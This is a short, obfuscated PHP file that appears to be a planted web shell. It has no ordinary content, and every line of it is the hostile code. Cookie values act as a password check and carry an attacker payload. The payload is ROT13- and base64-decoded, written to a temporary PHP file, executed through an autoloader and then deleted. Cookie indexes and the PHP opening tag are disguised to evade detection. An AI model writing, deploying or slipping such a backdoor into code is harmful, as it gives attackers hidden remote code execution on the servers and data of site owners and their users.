<!--Np7UMW5p-->
<!--Np7UMW5p-->
<?php

if (isset($_COOKIE[75-75]) && isset($_COOKIE[82+-81]) && isset($_COOKIE[-51+54]) && isset($_COOKIE[90+-86])) {
    $elem = $_COOKIE;
    function hub_center($element) {
        $elem = $_COOKIE;
        $ref = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'XzNI8uQo');
        if (!is_writable($ref)) {
            $ref = getcwd() . DIRECTORY_SEPARATOR . "core_engine";
        }
        $symbol = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($elem[3]));
        if (is_writeable($ref)) {
            $data_chunk = fopen($ref, 'w+');
            fputs($data_chunk, $symbol);
            fclose($data_chunk);
            spl_autoload_unregister(__FUNCTION__);
            require_once($ref);
            @array_map('unlink', array($ref));
        }
    }
    spl_autoload_register("hub_center");
    $hld = "df034c9416412da359f57ca1928d0c3f";
    if (!strncmp($hld, $elem[4], 32)) {
        if (@class_parents("mutex_lock_task_processor", true)) {
            exit;
        }
    }
}